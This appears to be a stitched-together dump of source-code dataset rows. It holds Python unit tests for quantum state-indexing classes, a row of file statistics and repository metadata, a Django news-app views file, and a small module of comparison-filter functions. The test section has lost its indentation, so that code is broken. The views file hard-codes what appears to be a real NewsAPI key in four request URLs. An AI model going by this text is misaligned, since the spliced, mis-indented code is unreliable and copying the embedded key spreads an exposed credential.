assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
def test_StateIndexingPauli_ssq():
si = StateIndexingPauli(4, indexing='ssq')
assert si.npauli_ == 16
assert si.npauli == 10
assert list(si.shiftlst0) == [0, 1, 5, 11, 15, 16]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 2, 1, 2, 3, 4, 5, 6, 3, 3, 7, 8, 7, 8, 9]
assert list(si.booldm0) == [1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0, 1]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 8
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 6
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.npauli_ == 11
assert si.npauli == 7
assert list(si.shiftlst0) == [0, 1, 1, 7, 11, 11]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 2, 3, 4, 1, 1, 5, 6, 5, 6]
assert list(si.booldm0) == [1, 1, 1, 1, 1, 0, 0, 1, 1, 0, 0]
assert si.get_ind_dm0(8, 8, 2, maptype=0) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=1) == 4
assert si.get_ind_dm0(8, 8, 2, maptype=2) == 1
def test_StateIndexingDM_charge():
si = StateIndexingDM(4, indexing='charge')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 43
assert si.ndm0r == 70
assert si.npauli_ == 16
assert si.npauli == 16
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 16, 17, 18, 16, 2, 19, 20, 17, 19, 3, 21, 18, 20, 21, 4, 5, 22, 23, 24, 25, 26, 22, 6, 27, 28, 29, 30, 23, 27, 7, 31, 32, 33, 24, 28, 31, 8, 34, 35, 25, 29, 32, 34, 9, 36, 26, 30, 33, 35, 36, 10, 11, 37, 38, 39, 37, 12, 40, 41, 38, 40, 13, 42, 39, 41, 42, 14, 15]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (3, 3), 4: (4, 4), 5: (5, 5), 6: (6, 6), 7: (7, 7), 8: (8, 8), 9: (9, 9), 10: (10, 10), 11: (11, 11), 12: (12, 12), 13: (13, 13), 14: (14, 14), 15: (15, 15), 16: (1, 2), 17: (1, 3), 18: (1, 4), 19: (2, 3), 20: (2, 4), 21: (3, 4), 22: (5, 6), 23: (5, 7), 24: (5, 8), 25: (5, 9), 26: (5, 10), 27: (6, 7), 28: (6, 8), 29: (6, 9), 30: (6, 10), 31: (7, 8), 32: (7, 9), 33: (7, 10), 34: (8, 9), 35: (8, 10), 36: (9, 10), 37: (11, 12), 38: (11, 13), 39: (11, 14), 40: (12, 13), 41: (12, 14), 42: (13, 14)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]
assert list(si.conjdm0) == [1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 31
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 24
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 32
assert si.ndm0r == 53
assert si.npauli_ == 11
assert si.npauli == 11
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 11, 12, 13, 14, 15, 11, 2, 16, 17, 18, 19, 12, 16, 3, 20, 21, 22, 13, 17, 20, 4, 23, 24, 14, 18, 21, 23, 5, 25, 15, 19, 22, 24, 25, 6, 7, 26, 27, 28, 26, 8, 29, 30, 27, 29, 9, 31, 28, 30, 31, 10]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (9, 9), 6: (10, 10), 7: (11, 11), 8: (12, 12), 9: (13, 13), 10: (14, 14), 11: (5, 6), 12: (5, 7), 13: (5, 8), 14: (5, 9), 15: (5, 10), 16: (6, 7), 17: (6, 8), 18: (6, 9), 19: (6, 10), 20: (7, 8), 21: (7, 9), 22: (7, 10), 23: (8, 9), 24: (8, 10), 25: (9, 10), 26: (11, 12), 27: (11, 13), 28: (11, 14), 29: (12, 13), 30: (12, 14), 31: (13, 14)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1]
assert list(si.conjdm0) == [1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 20
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 13
assert si.get_ind_dm1(5, 4, 1) == 3
def test_StateIndexingDM_ssq():
si = StateIndexingDM(4, indexing='ssq')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 15
assert si.ndm0r == 20
assert si.npauli_ == 16
assert si.npauli == 10
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 10, -1, -1, 10, 2, -1, -1, -1, -1, 1, 10, -1, -1, 10, 2, 3, -1, -1, -1, -1, -1, -1, 4, 11, 12, -1, -1, -1, 11, 5, 13, -1, -1, -1, 12, 13, 6, -1, -1, -1, -1, -1, -1, 3, -1, -1, -1, -1, -1, -1, 3, 7, 14, -1, -1, 14, 8, -1, -1, -1, -1, 7, 14, -1, -1, 14, 8, 9]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (5, 5), 4: (6, 6), 5: (7, 7), 6: (8, 8), 7: (11, 11), 8: (12, 12), 9: (15, 15), 10: (1, 2), 11: (6, 7), 12: (6, 8), 13: (7, 8), 14: (11, 12)}
assert list(si.booldm0) == [1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
assert list(si.conjdm0) == [1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 13
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 11
assert si.ndm0r == 15
assert si.npauli_ == 11
assert si.npauli == 7
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, -1, -1, -1, -1, -1, -1, 2, 7, 8, -1, -1, -1, 7, 3, 9, -1, -1, -1, 8, 9, 4, -1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 5, 10, -1, -1, 10, 6, -1, -1, -1, -1, 5, 10, -1, -1, 10, 6]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (11, 11), 6: (12, 12), 7: (6, 7), 8: (6, 8), 9: (7, 8), 10: (11, 12)}
assert list(si.booldm0) == [1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
assert list(si.conjdm0) == [1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 9
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(7, 8, 2, maptype=3) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 0
assert si.get_ind_dm0(8, 7, 2, maptype=3) == 0
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 3
def test_StateIndexingDMc_charge():
si = StateIndexingDMc(4, indexing='charge')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 70
assert si.ndm0r == 124
assert si.npauli_ == 16
assert si.npauli == 16
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 16, 17, 18, 19, 2, 20, 21, 22, 23, 3, 24, 25, 26, 27, 4, 5, 28, 29, 30, 31, 32, 33, 6, 34, 35, 36, 37, 38, 39, 7, 40, 41, 42, 43, 44, 45, 8, 46, 47, 48, 49, 50, 51, 9, 52, 53, 54, 55, 56, 57, 10, 11, 58, 59, 60, 61, 12, 62, 63, 64, 65, 13, 66, 67, 68, 69, 14, 15]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (3, 3), 4: (4, 4), 5: (5, 5), 6: (6, 6), 7: (7, 7), 8: (8, 8), 9: (9, 9), 10: (10, 10), 11: (11, 11), 12: (12, 12), 13: (13, 13), 14: (14, 14), 15: (15, 15), 16: (1, 2), 17: (1, 3), 18: (1, 4), 19: (2, 1), 20: (2, 3), 21: (2, 4), 22: (3, 1), 23: (3, 2), 24: (3, 4), 25: (4, 1), 26: (4, 2), 27: (4, 3), 28: (5, 6), 29: (5, 7), 30: (5, 8), 31: (5, 9), 32: (5, 10), 33: (6, 5), 34: (6, 7), 35: (6, 8), 36: (6, 9), 37: (6, 10), 38: (7, 5), 39: (7, 6), 40: (7, 8), 41: (7, 9), 42: (7, 10), 43: (8, 5), 44: (8, 6), 45: (8, 7), 46: (8, 9), 47: (8, 10), 48: (9, 5), 49: (9, 6), 50: (9, 7), 51: (9, 8), 52: (9, 10), 53: (10, 5), 54: (10, 6), 55: (10, 7), 56: (10, 8), 57: (10, 9), 58: (11, 12), 59: (11, 13), 60: (11, 14), 61: (12, 11), 62: (12, 13), 63: (12, 14), 64: (13, 11), 65: (13, 12), 66: (13, 14), 67: (14, 11), 68: (14, 12), 69: (14, 13)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 40
    assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
    assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 30
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 53
assert si.ndm0r == 95
assert si.npauli_ == 11
assert si.npauli == 11
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, 11, 12, 13, 14, 15, 16, 2, 17, 18, 19, 20, 21, 22, 3, 23, 24, 25, 26, 27, 28, 4, 29, 30, 31, 32, 33, 34, 5, 35, 36, 37, 38, 39, 40, 6, 7, 41, 42, 43, 44, 8, 45, 46, 47, 48, 9, 49, 50, 51, 52, 10]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (9, 9), 6: (10, 10), 7: (11, 11), 8: (12, 12), 9: (13, 13), 10: (14, 14), 11: (5, 6), 12: (5, 7), 13: (5, 8), 14: (5, 9), 15: (5, 10), 16: (6, 5), 17: (6, 7), 18: (6, 8), 19: (6, 9), 20: (6, 10), 21: (7, 5), 22: (7, 6), 23: (7, 8), 24: (7, 9), 25: (7, 10), 26: (8, 5), 27: (8, 6), 28: (8, 7), 29: (8, 9), 30: (8, 10), 31: (9, 5), 32: (9, 6), 33: (9, 7), 34: (9, 8), 35: (9, 10), 36: (10, 5), 37: (10, 6), 38: (10, 7), 39: (10, 8), 40: (10, 9), 41: (11, 12), 42: (11, 13), 43: (11, 14), 44: (12, 11), 45: (12, 13), 46: (12, 14), 47: (13, 11), 48: (13, 12), 49: (13, 14), 50: (14, 11), 51: (14, 12), 52: (14, 13)}
assert list(si.booldm0) == [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 23
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == 13
assert si.get_ind_dm1(5, 4, 1) == 3
def test_StateIndexingDMc_ssq():
si = StateIndexingDMc(4, indexing='ssq')
assert si.ndm0_tot == 70
assert si.ndm0_ == 70
assert si.ndm0 == 20
assert si.ndm0r == 30
assert si.npauli_ == 16
assert si.npauli == 10
assert si.ndm1_tot == 56
assert si.ndm1_ == 56
assert si.ndm1 == 56
assert list(si.shiftlst0) == [0, 1, 17, 53, 69, 70]
assert list(si.shiftlst1) == [0, 4, 28, 52, 56]
assert list(si.lenlst) == [1, 4, 6, 4, 1]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [1, 2, 3, 4], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [15], []]
assert list(si.mapdm0) == [0, 1, 10, -1, -1, 11, 2, -1, -1, -1, -1, 1, 10, -1, -1, 11, 2, 3, -1, -1, -1, -1, -1, -1, 4, 12, 13, -1, -1, -1, 14, 5, 15, -1, -1, -1, 16, 17, 6, -1, -1, -1, -1, -1, -1, 3, -1, -1, -1, -1, -1, -1, 3, 7, 18, -1, -1, 19, 8, -1, -1, -1, -1, 7, 18, -1, -1, 19, 8, 9]
assert si.inddm0 == {0: (0, 0), 1: (1, 1), 2: (2, 2), 3: (5, 5), 4: (6, 6), 5: (7, 7), 6: (8, 8), 7: (11, 11), 8: (12, 12), 9: (15, 15), 10: (1, 2), 11: (2, 1), 12: (6, 7), 13: (6, 8), 14: (7, 6), 15: (7, 8), 16: (8, 6), 17: (8, 7), 18: (11, 12), 19: (12, 11)}
assert list(si.booldm0) == [1, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 32
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 15
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 7
#
si.set_statesdm([[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], []])
assert si.ndm0_ == 53
assert si.ndm0 == 15
assert si.ndm0r == 23
assert si.npauli_ == 11
assert si.npauli == 7
assert si.ndm1_ == 24
assert si.ndm1 == 24
assert list(si.shiftlst0) == [0, 1, 1, 37, 53, 53]
assert list(si.shiftlst1) == [0, 0, 0, 24, 24]
assert list(si.lenlst) == [1, 0, 6, 4, 0]
assert list(si.dictdm) == [0, 0, 1, 2, 3, 0, 1, 2, 3, 4, 5, 0, 1, 2, 3, 0]
assert si.statesdm == [[0], [], [5, 6, 7, 8, 9, 10], [11, 12, 13, 14], [], []]
assert list(si.mapdm0) == [0, 1, -1, -1, -1, -1, -1, -1, 2, 7, 8, -1, -1, -1, 9, 3, 10, -1, -1, -1, 11, 12, 4, -1, -1, -1, -1, -1, -1, 1, -1, -1, -1, -1, -1, -1, 1, 5, 13, -1, -1, 14, 6, -1, -1, -1, -1, 5, 13, -1, -1, 14, 6]
assert si.inddm0 == {0: (0, 0), 1: (5, 5), 2: (6, 6), 3: (7, 7), 4: (8, 8), 5: (11, 11), 6: (12, 12), 7: (6, 7), 8: (6, 8), 9: (7, 6), 10: (7, 8), 11: (8, 6), 12: (8, 7), 13: (11, 12), 14: (12, 11)}
assert list(si.booldm0) == [1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
assert si.get_ind_dm0(7, 8, 2, maptype=0) == 16
assert si.get_ind_dm0(7, 8, 2, maptype=1) == 10
assert si.get_ind_dm0(7, 8, 2, maptype=2) == 1
assert si.get_ind_dm0(8, 7, 2, maptype=2) == 1
assert si.get_ind_dm0(5, 8, 2, maptype=1) == -1
assert si.get_ind_dm1(5, 4, 1) == 3
| 58.493644 | 900 | 0.44011 | 5,560 | 27,609 | 2.130216 | 0.027338 | 0.086457 | 0.08612 | 0.082067 | 0.78183 | 0.749325 | 0.72923 | 0.704745 | 0.687099 | 0.673674 | 0 | 0.275803 | 0.299902 | 27,609 | 471 | 901 | 58.617834 | 0.336955 | 0 | 0 | 0.485437 | 0 | 0 | 0.003008 | 0 | 0 | 0 | 0 | 0 | 0.711165 | 1 | 0.055825 | false | 0 | 0.002427 | 0 | 0.058252 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b7c6da9e985b1af126f132f1fe97774370c9a2fe | 1,129 | py | Python | Scripts/Miscellaneous/newsapp/news/views.py | valterm/Python_and_the_Web | a51b97870576dde8e8b7e78144e3b7ef8edebeac | [
"MIT"
] | 3 | 2020-10-13T17:41:33.000Z | 2021-06-02T15:01:58.000Z | Scripts/Miscellaneous/newsapp/news/views.py | valterm/Python_and_the_Web | a51b97870576dde8e8b7e78144e3b7ef8edebeac | [
"MIT"
] | null | null | null | Scripts/Miscellaneous/newsapp/news/views.py | valterm/Python_and_the_Web | a51b97870576dde8e8b7e78144e3b7ef8edebeac | [
"MIT"
] | null | null | null | from django.shortcuts import render
import requests
import json
# Create your views here.
def home(request):
    news_api_requests = requests.get("http://newsapi.org/v2/top-headlines?country=in&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
    api = json.loads(news_api_requests.content)
    return render(request, 'home.html', {'api': api})
def bussiness(request):
    news_api_requests = requests.get("http://newsapi.org/v2/top-headlines?country=in&category=business&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
    api = json.loads(news_api_requests.content)
    return render(request, 'bussiness.html', {'api': api})
def entertainment(request):
    news_api_requests = requests.get("http://newsapi.org/v2/top-headlines?country=in&category=entertainment&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
    api = json.loads(news_api_requests.content)
    return render(request, 'entertainment.html', {'api': api})
def sports(request):
    news_api_requests = requests.get("http://newsapi.org/v2/top-headlines?country=in&category=sports&apiKey=82b29d682aea4a05b79b1f53dc4c2f95")
    api = json.loads(news_api_requests.content)
    return render(request, 'sports.html', {'api': api})
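The four views above repeat the same fetch-parse-render pattern with only the category changing. A minimal standalone sketch of a URL-building helper that could remove that duplication — the `build_headlines_url` name and the placeholder key are assumptions, not part of the original app:

```python
# Hypothetical helper consolidating the duplicated URL construction above.
# A real key should come from settings or an environment variable, never
# be hard-coded in source as in the views above.
NEWS_API_KEY = "<your-api-key>"  # placeholder, not a real key

def build_headlines_url(country="in", category=None, api_key=NEWS_API_KEY):
    """Build a NewsAPI top-headlines URL; category is optional."""
    url = f"https://newsapi.org/v2/top-headlines?country={country}"
    if category:
        url += f"&category={category}"
    return url + f"&apiKey={api_key}"
```

Each view could then call `requests.get(build_headlines_url(category="sports"))` instead of repeating the full URL string.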
| 41.814815 | 145 | 0.798051 | 147 | 1,129 | 6.020408 | 0.244898 | 0.063277 | 0.135593 | 0.099435 | 0.754802 | 0.754802 | 0.754802 | 0.754802 | 0.754802 | 0.754802 | 0 | 0.075614 | 0.062888 | 1,129 | 26 | 146 | 43.423077 | 0.76087 | 0.020372 | 0 | 0.210526 | 0 | 0.157895 | 0.421578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.157895 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
b7d2215951ea51bb127a710281d5d0d503cf668c | 1,365 | py | Python | query_collections/filters.py | c4wrd/query_collections | 18f0368ecf3f487bbdad518bc687a47b94279b1c | [
"MIT"
] | null | null | null | query_collections/filters.py | c4wrd/query_collections | 18f0368ecf3f487bbdad518bc687a47b94279b1c | [
"MIT"
] | 4 | 2016-03-17T21:56:04.000Z | 2016-03-17T22:27:53.000Z | query_collections/filters.py | c4wrd/query_collections | 18f0368ecf3f487bbdad518bc687a47b94279b1c | [
"MIT"
] | null | null | null | def eq(compare_item):
"""
Ensures the filtered item equals the compare_item
result == compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item == compare_item
return callback
def less(compare_item):
"""
Ensures the filtered item is less than the compare_item
result < compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item < compare_item
return callback
def greater(compare_item):
"""
Ensures the filtered item is greater than the compare_item
result > compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item > compare_item
return callback
def lessEqual(compare_item):
"""
    Ensures the filtered item is less than or equal to the compare_item
result <= compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item <= compare_item
return callback
def greaterEqual(compare_item):
"""
Ensures the filtered item is greater than or equal to the compare_item
result >= compare_item
:return: Callback to be used by the query search.
"""
def callback(item):
return item >= compare_item
return callback
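Because every factory above returns a plain one-argument predicate, the callbacks compose with Python built-ins as well as with the query search. A quick demo, restating `greater` so the snippet is self-contained:

```python
def greater(compare_item):
    """Restated from the module above so this demo runs on its own."""
    def callback(item):
        return item > compare_item
    return callback

# The returned callback is an ordinary predicate, so it works anywhere a
# one-argument boolean function is expected, e.g. the built-in filter():
matches = list(filter(greater(3), [1, 2, 3, 4, 5]))
print(matches)  # [4, 5]
```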
